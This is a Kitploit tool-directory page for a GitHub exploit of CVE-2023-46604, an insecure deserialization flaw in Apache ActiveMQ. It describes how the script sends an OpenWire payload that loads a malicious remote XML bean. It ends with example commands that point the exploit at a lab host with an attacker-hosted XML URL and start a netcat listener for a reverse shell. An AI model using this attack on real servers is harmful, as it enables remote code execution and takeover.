Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-46604 — El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) | Kitploit
Tools/GitHubGitHub/pulentoski/cve-2023-46604
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access ToolPayload Development
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604)

View Repository
11102 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Technical Summary of the Attack: CVE-2023-46604

The script exploits an insecure deserialization vulnerability in Apache ActiveMQ (CVE-2023-46604) to achieve remote code execution on the target server. Description of the Exploitation Process

Vulnerability Target:
    The vulnerability resides in the OpenWire protocol of Apache ActiveMQ.
    It allows insecure deserialization of objects, which can be leveraged to execute arbitrary code on the server.

Prerequisites:
    Network access to the ActiveMQ server.
    A malicious XML file (poc.xml) available through a URL accessible by the target server.

Attack Components:
    Python Script: Automates sending the malicious payload to the ActiveMQ server.
    XML File (poc.xml): Contains a Spring bean that defines the execution of a malicious command (e.g., opening a reverse shell).

Attack Steps

Payload Preparation:
    The script builds a hexadecimal message that includes:
        The name of the Java class: org.springframework.context.support.ClassPathXmlApplicationContext.
        The URL of the malicious XML file.
    The payload is converted into a byte sequence that can be sent via the OpenWire protocol.

Payload Delivery:
    The script opens a TCP socket connection to the ActiveMQ server on the specified port (default 61616).
    Sends the malicious payload to the server.

Malicious Code Execution:
    The ActiveMQ server deserializes the object specified in the payload.
    Due to insecure deserialization, the Spring bean defined in the XML file is loaded and executed.
    This bean executes a malicious command (e.g., a reverse shell) on the server.

    _________________________________________________________

example execution:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

this script was copied and modified in spanish:https://github.com/evkl1d/CVE-2023-46604.git

Download Tool